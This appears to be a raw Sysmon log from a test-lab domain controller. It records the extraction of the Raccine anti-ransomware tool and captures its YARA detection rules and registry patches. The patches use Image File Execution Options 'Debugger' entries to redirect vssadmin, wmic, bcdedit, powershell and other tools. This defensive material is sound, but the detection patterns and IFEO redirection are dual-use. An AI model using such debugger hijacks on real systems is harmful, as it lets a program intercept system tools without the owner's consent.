20:09:37.582{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\gen_ransomware_command_lines.yar2021-01-03 15:16:16.000MD5=762A90EA12262157B9232D236EED6EE5,SHA256=EF0C40289DC5CFADFB341B20891CB960AC32225E8C012CD8467B47189C5C1DFC,IMPHASH=00000000000000000000000000000000- 11241100x80000000000000001896349Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.580{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\gen_ransomware_command_lines.yar2021-12-08 20:09:37.580 15241500x80000000000000001896348Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.579{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\gen_raccine_kills.yar:Zone.Identifier2021-03-23 23:13:02.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896347Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.579{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\gen_raccine_kills.yar:Zone.Identifier2021-03-23 23:13:02.000 15241500x80000000000000001896346Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.579{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\gen_raccine_kills.yar2021-03-23 23:13:02.000MD5=AB572B9BD5F20A7968C7131087B37BA9,SHA256=B630564B4976590A6549450BCAB4F1369396599053539CC13EEC03F8A21EC2C2,IMPHASH=00000000000000000000000000000000rule ransomware_command_lines { strings: $s1 = "taskkill" nocase ascii $s2 = "RaccineSettings.exe" nocase ascii condition: all of them } 11241100x80000000000000001896345Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.576{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\gen_raccine_kills.yar2021-12-08 20:09:37.576 15241500x80000000000000001896344Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.575{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\gen_powershell_invocation.yar:Zone.Identifier2020-10-29 21:28:24.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896343Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.575{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\gen_powershell_invocation.yar:Zone.Identifier2020-10-29 21:28:24.000 15241500x80000000000000001896342Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.574{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\gen_powershell_invocation.yar2020-10-29 21:28:24.000MD5=B133FF8F9B05CB9F100A8AC32A94CA41,SHA256=FA7E390A9FC283A129A4AD93E045D4E0FB9D88485C99543C42ECF8C1003DB672,IMPHASH=00000000000000000000000000000000- 11241100x80000000000000001896341Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.572{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\gen_powershell_invocation.yar2021-12-08 20:09:37.572 15241500x80000000000000001896340Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.571{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\ext-vars-test.yar:Zone.Identifier2020-10-31 10:14:04.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896339Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.570{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\ext-vars-test.yar:Zone.Identifier2020-10-31 10:14:04.000 15241500x80000000000000001896338Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.570{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\ext-vars-test.yar2020-10-31 10:14:04.000MD5=44CFDD7612842A1FAEB300D715E1CED9,SHA256=CA80F68E7E93F2648859E2498F31940F129303407821512B2CDDE770AD84CD14,IMPHASH=00000000000000000000000000000000rule env_vars_test { condition: Name contains "WMIC.exe" and CommandLine contains "delete justatest" } 11241100x80000000000000001896337Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.568{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara\ext-vars-test.yar2021-12-08 20:09:37.568 11241100x80000000000000001896336Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.567{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\yara2021-12-08 20:09:37.567 15241500x80000000000000001896335Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.565{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\scripts\windows-hardening.bat:Zone.Identifier2020-10-30 01:24:26.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896334Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.564{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\scripts\windows-hardening.bat:Zone.Identifier2020-10-30 01:24:26.000 15241500x80000000000000001896333Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.564{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\scripts\windows-hardening.bat2020-10-30 01:24:26.000MD5=45B6BAF36E2CB69BB2C1A605756E42B4,SHA256=D0651644E6F5E8BA1082F9A1573D0D985821A5AE7F36D52BAA2DD224BF052905,IMPHASH=00000000000000000000000000000000- 11241100x80000000000000001896332Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.562{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\scripts\windows-hardening.bat2021-12-08 20:09:37.562 11241100x80000000000000001896331Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.561{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\scripts2021-12-08 20:09:37.561 15241500x80000000000000001896330Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.559{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-wmic.reg:Zone.Identifier2020-10-21 11:07:52.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896329Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.558{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-wmic.reg:Zone.Identifier2020-10-21 11:07:52.000 15241500x80000000000000001896328Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.558{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-wmic.reg2020-10-21 11:07:52.000MD5=1EAFB26155E00728CFBD3BB2789C9D74,SHA256=14C89B20CF5111CA625532E0C177B555435C1548018D61A0A203BCD7D235AC14,IMPHASH=00000000000000000000000000000000Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exe] "Debugger"="C:\\Program Files\\Raccine\\Raccine.exe" 11241100x80000000000000001896327Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.555{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-wmic.reg2021-12-08 20:09:37.555 15241500x80000000000000001896326Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.554{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-wbadmin.reg:Zone.Identifier2020-10-21 11:07:52.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896325Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.554{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-wbadmin.reg:Zone.Identifier2020-10-21 11:07:52.000 15241500x80000000000000001896324Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.554{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-wbadmin.reg2020-10-21 11:07:52.000MD5=21F666B6606E574082DA8E9924FD56CE,SHA256=CD48A5A02BA1DF4C96662181053310286A94816C3C64FBB244E500D16EABB9E6,IMPHASH=00000000000000000000000000000000Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exe] "Debugger"="C:\\Program Files\\Raccine\\Raccine.exe" 11241100x80000000000000001896323Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.551{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-wbadmin.reg2021-12-08 20:09:37.551 15241500x80000000000000001896322Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.550{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-vssadmin.reg:Zone.Identifier2020-10-21 11:07:52.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896321Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.550{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-vssadmin.reg:Zone.Identifier2020-10-21 11:07:52.000 15241500x80000000000000001896320Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.550{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-vssadmin.reg2020-10-21 11:07:52.000MD5=2F9FDEEC0E96BEB9893D5A6919D09E1A,SHA256=8D2413EC3564B02C545530B8950B96BD3A309EBABA3FC6130A454D8C3255103B,IMPHASH=00000000000000000000000000000000Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exe] "Debugger"="C:\\Program Files\\Raccine\\Raccine.exe" 11241100x80000000000000001896319Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.547{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-vssadmin.reg2021-12-08 20:09:37.547 15241500x80000000000000001896318Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.546{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-uninstall.reg:Zone.Identifier2021-03-23 23:06:44.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896317Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.546{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-uninstall.reg:Zone.Identifier2021-03-23 23:06:44.000 15241500x80000000000000001896316Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.546{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-uninstall.reg2021-03-23 23:06:44.000MD5=5066B1D921200BEC2868BC76723A53AA,SHA256=95CB74E651394CF6F911AF3EAFCB94FE206239F3EA5A160530913E796C56E85F,IMPHASH=00000000000000000000000000000000- 11241100x80000000000000001896315Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.543{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-uninstall.reg2021-12-08 20:09:37.543 15241500x80000000000000001896314Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.542{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-taskkill.reg:Zone.Identifier2021-03-23 23:06:24.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896313Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.541{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-taskkill.reg:Zone.Identifier2021-03-23 23:06:24.000 15241500x80000000000000001896312Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.541{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-taskkill.reg2021-03-23 23:06:24.000MD5=9510E48B070A862B7584D902F8C3E5CA,SHA256=29CC01D0117B9062BE97ED0B9DDD6932CC10C08A1D1EFAF12381A910DD083EEB,IMPHASH=00000000000000000000000000000000Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe] "Debugger"="C:\\Program Files\\Raccine\\Raccine.exe" 11241100x80000000000000001896311Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.539{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-taskkill.reg2021-12-08 20:09:37.538 15241500x80000000000000001896310Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.537{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-ransomware.reg:Zone.Identifier2020-10-21 10:20:32.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896309Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.537{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-ransomware.reg:Zone.Identifier2020-10-21 10:20:32.000 15241500x80000000000000001896308Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.537{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-ransomware.reg2020-10-21 10:20:32.000MD5=6ACF6ED0E7FB470E9A8040E8D3E465EC,SHA256=D311FBD94B118367DA8F8C604C2DCD9DA1A47EDF69EBF0C007CBD0083D54111F,IMPHASH=00000000000000000000000000000000Windows Registry Editor Version 5.00 ; RYUK Ransomware ; Source: https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/ [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xxx.exe] "Debugger"="notepad.exe" 11241100x80000000000000001896307Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.534{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-ransomware.reg2021-12-08 20:09:37.534 15241500x80000000000000001896306Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.533{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-powershell.reg:Zone.Identifier2020-10-21 11:07:52.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896305Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.533{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-powershell.reg:Zone.Identifier2020-10-21 11:07:52.000 15241500x80000000000000001896304Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.532{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-powershell.reg2020-10-21 11:07:52.000MD5=35677E2BFBE58D448F8313302564BEC3,SHA256=C34EB3DC6FEFA410F6B2356A39C83DAC3A5D1571ACFE4EE966B6BAE0C990B8C8,IMPHASH=00000000000000000000000000000000Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe] "Debugger"="C:\\Program Files\\Raccine\\Raccine.exe" 11241100x80000000000000001896303Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.529{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-powershell.reg2021-12-08 20:09:37.529 15241500x80000000000000001896302Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.528{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-net.reg:Zone.Identifier2020-10-30 00:05:52.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896301Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.528{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-net.reg:Zone.Identifier2020-10-30 00:05:52.000 15241500x80000000000000001896300Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.528{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-net.reg2020-10-30 00:05:52.000MD5=DB527F121D3088FE56D4211C7F09D39E,SHA256=B526148468AA3223DAF2683AED9B92AFFEED2B30018E069C5F4DF9693E16B30A,IMPHASH=00000000000000000000000000000000Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe] "Debugger"="C:\\Program Files\\Raccine\\Raccine.exe" 11241100x80000000000000001896299Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.526{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-net.reg2021-12-08 20:09:37.525 15241500x80000000000000001896298Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.524{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-diskshadow.reg:Zone.Identifier2020-10-21 11:07:52.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896297Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.524{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-diskshadow.reg:Zone.Identifier2020-10-21 11:07:52.000 15241500x80000000000000001896296Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.524{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-diskshadow.reg2020-10-21 11:07:52.000MD5=3A1ADBF37E9155CC160B5E4D67164883,SHA256=2CA6B3A73C5C0BC9B4484E3A4F22D5349CB2A23F8CCB2CE163B17C41CBA408E2,IMPHASH=00000000000000000000000000000000Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exe] "Debugger"="C:\\Program Files\\Raccine\\Raccine.exe" 11241100x80000000000000001896295Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.521{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-diskshadow.reg2021-12-08 20:09:37.520 15241500x80000000000000001896294Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.519{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-bcdedit.reg:Zone.Identifier2020-10-21 11:07:52.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896293Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.518{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-bcdedit.reg:Zone.Identifier2020-10-21 11:07:52.000 15241500x80000000000000001896292Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.518{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-bcdedit.reg2020-10-21 11:07:52.000MD5=DFCE25617E5E3C62DF2AE63386A02D6D,SHA256=74B3E19302F8A1A4882351E67AA1C6434F8125769A2C46787C7F3B226A51A47F,IMPHASH=00000000000000000000000000000000Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exe] "Debugger"="C:\\Program Files\\Raccine\\Raccine.exe" 11241100x80000000000000001896291Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.515{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches\raccine-reg-patch-bcdedit.reg2021-12-08 20:09:37.515 11241100x80000000000000001896290Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 20:09:37.513{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\reg-patches2021-12-08 20:09:37.513 15241500x80000000000000001896289Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:09:37.512{9DBE88B5-3A90-61AE-EDA7-000000000E02}2816C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\Raccine\Raccine\preqeq\vc_redist.x86.exe:Zone.Identifier2021-06-01 15:06:48.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 11241100x80000000000000001896288Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localDownloads2021-12-08 